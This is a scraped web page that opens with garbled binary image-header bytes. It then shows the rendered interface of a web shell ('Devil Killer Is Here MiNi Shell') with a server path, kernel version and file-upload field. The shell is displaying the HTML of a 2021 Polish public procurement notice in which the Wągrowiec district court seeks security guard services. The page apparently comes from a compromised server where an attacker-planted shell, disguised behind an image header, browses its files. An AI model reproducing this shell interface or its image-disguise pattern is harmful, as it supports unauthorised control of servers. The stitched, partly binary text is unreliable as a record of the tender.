JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211119/0027617701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług ochrony fizycznej i dozoru <br/> mienia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SĄD REJONOWY W WĄGROWCU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000324168</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wągrowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67-2681220</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektor@wagrowiec.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wagrowiec.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sądownictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej i dozoru <br/> mienia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1bb2ab64-48b4-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00276177</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00275238/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa ochrony i dozoru mienia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków<br/>komunikacji elektronicznej zapewnionych przez system zapewniający obsługę procesu udzielania<br/>zamówień publicznych za pośrednictwem środków komunikacji elektronicznej w jednostkach<br/>organizacyjnych podległych lub nadzorowanych przez Ministra Sprawiedliwości, zwany dalej<br/>Systemem.<br/>System jest dostępny pod adresem: https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Instrukcja<br/>użytkownika Wykonawcy oraz złożenia oferty dostępna jest w Systemie w zakładce Elearning.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i<br/>informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług<br/>Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich<br/>użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-350-1/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usługi ochrony fizycznej osób i dozoru mienia przez kwalifikowanych pracowników ochrony fizycznej w trzech budynkach zajmowanych przez Sąd Rejonowy w Wągrowcu, położonych w Wągrowcu przy ul. Kościuszki 18, Kościuszki 27 oraz pomieszczeń archiwum umiejscowionych w piwnicach budynku PKO Bank Polski przy ul. Jeżyka 2A. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zgodnie z art. 441 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość skorzystania w trakcie obowiązywania umowy z prawa opcji, a Wykonawca wyraża na to zgodę. Podstawą uruchomienia zamówienia w zakresie prawa opcji będą potrzeby Zamawiającego polegające na:<br/>- zwiększeniu zakresu ochrony w budynku przy ul. Kościuszki 18, poprzez świadczenie przedmiotu Umowy przez dodatkowo jednego pracownika ochronny w dni robocze od poniedziałku do piątku w godzinach 7:00 – 19:00 (12 godzin) <br/>- dodatkowo dwóch pracowników ochrony w łącznym wymiarze 100 roboczo godzin w przypadku konieczności zabezpieczenia Sądu podczas remontów i innych zdarzeń. <br/>W formularzu ofertowym stanowiącym załącznik nr 2 do SWZ uwzględniono zamówienie objęte prawem opcji. <br/>Dodatkowy kwalifikowany pracownik ochrony z posterunku w budynku przy ul. Kościuszki 18 w godzinach służby będzie minimum co godzinę dokonywał obchodu w budynku przy ul. Kościuszki 18 (co nie ogranicza go wykonywania obchodu doraźnego w razie zaistnienia takiej konieczności) oraz będzie interweniował na bieżąco, gdy zajdzie taka potrzeba. Wskazany pracownik ochrony będzie również wsparciem dla posterunku jednoosobowego w budynku przy ul. Kościuszki 27 (łączność radiowa, stały kontakt, określone procedury zastępowania) oraz min. 2 razy dziennie obchód w budynku przy ul. Kościuszki 27. Dodatkowo pracownik ochrony minimum raz dziennie dokonuje obchodu z zewnątrz pomieszczenia wynajmowanego przez Sąd na archiwum umiejscowione w piwnicach PKO Bank Polski w Wągrowcu przy ul. Jeżyka 2A. Wszystkie obchody pracownik ochrony ma obowiązek odnotowywać w „książce służby” prowadzonej przez firmę ochroniarską, która znajduje się u pracowników ochrony w posterunkach. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty w oparciu o przyjęte w niniejszym<br/>postępowaniu kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przyjazdu grupy interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie szkoleń obsługi interesanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający wymaga aby wykonawca posiadał koncesję MSWiA na prowadzenie działalności<br/>gospodarczej w zakresie usług ochrony osób i mienia realizowanej w formie stałej,<br/>bezpośredniej ochrony fizycznej. (podstawa: Art. 15 ust. 1 Ustawy z dnia 22 sierpnia 1997 r o<br/>ochronie osób i mienia, t.j. Dz.U.2020 poz. 838).<br/>W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia warunek ten jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia, tj. koncesję MSWiA<br/>na prowadzoną działalność gospodarczą i zrealizuje usługi ochrony osób i mienia.<br/>2) zdolności technicznej lub zawodowej<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat<br/>liczonych wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie wykonał przynajmniej dwie usługi ochrony osób i mienia<br/>w budynku użyteczności publicznej, gdzie okres świadczenia usługi trwał nieprzerwanie<br/>minimum 12 miesięcy o wartości 200.000,00zł<br/>Budynek użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na potrzeby<br/>administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa<br/>wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu,<br/>gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym,<br/>lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub<br/>telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania<br/>podobnych funkcji, w tym także budynek biurowy i socjalny.<br/>W przypadku gdy wartość umowy została wyrażona w innej walucie niż PLN należy dokonać<br/>przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia umowy.<br/>Warunek doświadczenia nie podlega sumowaniu – oznacza to, że albo Wykonawca składający<br/>ofertę wykaże się realizacją dwóch wymaganych usług, albo jeden z uczestników konsorcjum<br/>wykaże się realizacją dwóch wymaganych usług, albo w sytuacji gdy Wykonawca, który nie ma<br/>wymaganego doświadczenia, polega na zasobach innego podmiotu – podmiot ten musi wykazać<br/>zrealizowanie dwóch wymaganych usług.<br/>W odniesieniu do warunków dotyczących doświadczenia, wykonawcy mogą polegać na<br/>zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te<br/>zdolności są wymagane.<br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy)<br/>realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy<br/>wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego<br/>zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w<br/>zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych<br/>dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez<br/>wykonawcę faktur.<br/>Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania prac bezpośrednio u<br/>podmiotu, na rzecz, którego były wykonane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu: Zamawiający nie<br/>wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta zostanie oceniona jako<br/>najkorzystniejsza, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień<br/>złożenia podmiotowych środków dowodowych:<br/>1) W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykaz usług w zakresie niezbędnym do potwierdzenia spełniania warunku udziału w postępowaniu<br/>określonego przez zamawiającego w Rozdziale V ust. 1 pkt 1.2 ppkt 2, z podaniem ich rodzaju,<br/>wartości, daty, miejsca wykonania i podmiotów na rzecz których usługi te zostały wykonane – druk<br/>wykazu stanowi - Załącznik nr 7 do SWZ,<br/>b) dowody określające czy usługi zawarte w wyżej wymienionym wykazie zostały wykonane należycie.<br/>Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego usługi<br/>były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie wykonawcy,<br/>c) Koncesja MSWiA na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i<br/>mienia, o której mowa w rozdziale 4 „Zasady prowadzenia działalności gospodarczej w zakresie usług<br/>ochrony osób i mienia oraz kontrola tej działalności” Ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tekst jednolity Dz.U. z 2020 r. poz. 838)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego (lider konsorcjum). Pełnomocnik konsorcjum winien zalogować się na swoim profilu<br/>Wykonawcy i składając ofertę w zakładce „Wykonawcy&#34; dodać pozostałych Wykonawców<br/>wpisując ich dane. Pełnomocnictwo należy dołączyć do oferty.<br/>Pełnomocnictwo musi być złożone w oryginale w takiej samej formie, jak składana oferta.<br/>3.2. Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku<br/>postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie<br/>oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich wykonawców<br/>składających ofertę wspólną.<br/>3.3. Nie dopuszcza się uczestniczenia któregokolwiek z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, równocześnie oferty<br/>indywidualnej oraz w ramach grupy wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3.4. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>oświadczenie z art. 125 ust. 1 Ustawy z dnia 11 września 2019 roku - Prawo zamówień<br/>publicznych (tekst jednolity Dz. U. z 2021 r. poz. 1129, ze zm.) składa każdy z wykonawców<br/>wspólnie ubiegających się o zamówienie, przy czym oświadczenie o spełnianiu warunków<br/>udziału w postępowaniu, o którym mowa w Rozdziale VI ust. 1 pkt 2 SWZ składa odpowiednio<br/>Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku. Oświadczenie te<br/>wstępnie potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw do wykluczenia.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania,<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Oświadczenie<br/>to musi zostać podpisane przez wszystkich wykonawców lub przez pełnomocnika,<br/>uprawnionego do podpisania tego oświadczenia, (art. 117 ust. 4 ustawy Pzp). Wzór<br/>oświadczenia stanowi załącznik nr 6 do SWZ.<br/>8. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, przed zawarciem umowy w sprawie zamówienia publicznego Zamawiający będzie<br/>żądał przedłożenia mu kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian w umowie na zasadach określonych we<br/>wzorze umowy stanowiącym –załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">składanie ofert odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pomocą Systemu SmartPzp dostępnego pod adresem: https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-30 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ofertę 